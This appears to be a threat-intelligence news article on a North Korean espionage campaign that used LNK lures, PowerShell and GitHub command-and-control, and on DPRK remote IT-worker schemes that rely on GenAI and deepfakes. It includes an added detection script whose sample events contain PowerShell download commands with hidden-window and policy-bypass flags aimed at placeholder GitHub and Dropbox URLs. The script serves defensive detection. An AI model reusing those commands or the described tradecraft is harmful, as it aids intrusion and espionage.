North Korean Cyber Espionage Targets Diplomats Using GitHub and IT Worker Schemes

Between March and July 2025, North Korean cyber operatives orchestrated a sophisticated espionage campaign targeting diplomatic missions in South Korea. The attackers employed at least 19 spear-phishing emails, meticulously crafted to impersonate trusted diplomatic contacts. These emails, written in multiple languages including Korean, English, Persian, Arabic, French, and Russian, contained convincing meeting invitations, official letters, and event announcements.

According to Trellix researchers Pham Duy Phuc and Alex Lanstein, the attackers utilized GitHub, a legitimate developer platform, as a covert command-and-control channel. The infection chain began with the delivery of password-protected malicious ZIP files hosted on platforms like Dropbox, Google Drive, or Daum Cloud. These archives contained Windows shortcut (LNK) files disguised as PDF documents. When opened, these shortcuts executed PowerShell scripts that fetched additional malware from GitHub, specifically a variant of the open-source remote access trojan (RAT) known as Xeno RAT. This malware granted the attackers control over compromised systems.

The campaign is attributed to the North Korean hacking group Kimsuky, previously linked to phishing attacks that employed GitHub to stage the MoonPeak variant of Xeno RAT. Despite overlaps in infrastructure and tactics, some indicators suggest potential involvement of China-based operatives.

The spear-phishing emails were designed to mimic legitimate diplomatic correspondence, incorporating official signatures, diplomatic terminology, and references to real events such as summits and forums. By impersonating trusted entities like embassies, ministries, and international organizations, the attackers enhanced the credibility of their lures.

Upon execution, the PowerShell script harvested system information and exfiltrated it to a private GitHub repository controlled by the attackers. It also retrieved additional payloads by parsing a text file (onf.txt) in the repository to extract a Dropbox URL hosting the MoonPeak trojan. The attackers demonstrated rapid infrastructure rotation, updating the onf.txt payload multiple times within an hour to deploy malware and remove traces after use. This rapid update cycle, combined with the use of cloud infrastructure, helped the malicious activities evade detection.
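As an added defender-side illustration (not code from the Trellix report or from the campaign itself), the following Python scores constructed Sysmon-style process-creation events for the behavioural chain described above: PowerShell launched from a shortcut double-click with hidden-window or execution-policy flags, a fetch from GitHub, and a nested PowerShell fetch from Dropbox. The sample events, the EXAMPLE-ORG/EXAMPLE-REPO URLs, the host list and the two-indicator threshold are all assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/onf.txt"'},
    {"id": 2, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "iwr https://www.dropbox.com/scl/fi/EXAMPLE/stage2.dat?dl=1"'},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Git\cmd\git.exe",
     "cmdline": "git pull origin main"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

# Shortcut disguised as a document: invitation.pdf.lnk, letter.docx.lnk, ...
LURE_NAME = re.compile(r"\.(pdf|docx?|hwp)\.lnk$", re.I)
# Cloud hosts the article names as staging/C2 channels (assumed hostnames).
CLOUD_HOSTS = re.compile(r"(raw\.githubusercontent\.com|api\.github\.com|github\.com|dropbox\.com|drive\.google\.com)", re.I)
# Common PowerShell flags used to run silently from a shortcut.
EVASION_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|enc(odedcommand)?\b)", re.I)

def is_lure_filename(name):
    """True for double-extension shortcut names such as invitation.pdf.lnk."""
    return bool(LURE_NAME.search(name))

def score_event(ev):
    """Return the list of reasons an event resembles the LNK -> PowerShell -> cloud chain."""
    reasons = []
    if "powershell" not in ev["image"].lower():
        return reasons
    parent = ev["parent"].lower()
    if parent.endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer (shortcut double-click)")
    elif "powershell" in parent:
        reasons.append("powershell spawned by powershell (staged download)")
    if EVASION_FLAGS.search(ev["cmdline"]):
        reasons.append("hidden window / execution-policy bypass")
    for host in CLOUD_HOSTS.findall(ev["cmdline"]):
        reasons.append(f"fetch from {host.lower()}")
    return reasons

def detect(events, min_reasons=2):
    """Events with at least min_reasons indicators, as (id, reasons) pairs."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev["id"], reasons))
    return hits
```

Tuning `min_reasons` trades noise for coverage: a lone GitHub fetch from PowerShell is routine on developer hosts, while explorer-spawned hidden PowerShell reaching a cloud host is worth a ticket.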

A time-based analysis of the attackers’ activity revealed that most operations originated from a timezone consistent with China, with a smaller proportion aligning with that of the Koreas. Notably, a clean 3-day pause in activity coincided with Chinese national holidays in early April 2025, but not with North or South Korean holidays. This observation raises the possibility that the campaign could be the result of North Korean operatives working from Chinese territory, a Chinese advanced persistent threat (APT) operation mimicking Kimsuky techniques, or a collaborative effort leveraging Chinese resources for North Korean intelligence gathering.

In a related development, CrowdStrike reported that over the past 12 months, more than 320 incidents involved North Koreans posing as remote IT workers to infiltrate companies and generate illicit revenue for the regime. This represents a 220% increase from the previous year. These operatives, tracked as Famous Chollima and Jasper Sleet, are believed to use generative artificial intelligence (GenAI) coding assistants like Microsoft Copilot or VSCodium and translation tools to assist with their daily tasks and communications. They are also likely to work multiple jobs simultaneously.

A crucial component of these operations involves recruiting individuals to run laptop farms: racks of company-issued laptops that the North Korean workers access remotely with tools like AnyDesk, making it appear that they are physically present in the countries where the companies are based.

Famous Chollima IT workers use GenAI to create attractive résumés, reportedly employ real-time deepfake technology to mask their true identities in video interviews, and leverage AI code tools to assist in their job duties. These tactics pose substantial challenges to traditional security defenses.

A leak of 1,389 email addresses linked to these IT workers revealed that 29 of the 63 unique email service providers are online tools allowing users to create temporary or disposable email addresses. Another six are related to privacy-focused services like Skiff, Proton Mail, and SimpleLogin. Nearly 89% of the email addresses are Gmail accounts, all guarded using Google Authenticator, two-factor authentication (2FA), and recovery backup emails. Many usernames include terms like developer, code, coder, tech, and software, indicating a focus on technology and programming.

Some of these email addresses appear in a user database leak of the AI photo editing tool Cutout.Pro, suggesting potential use of the software to alter images for social media profiles or identification documents.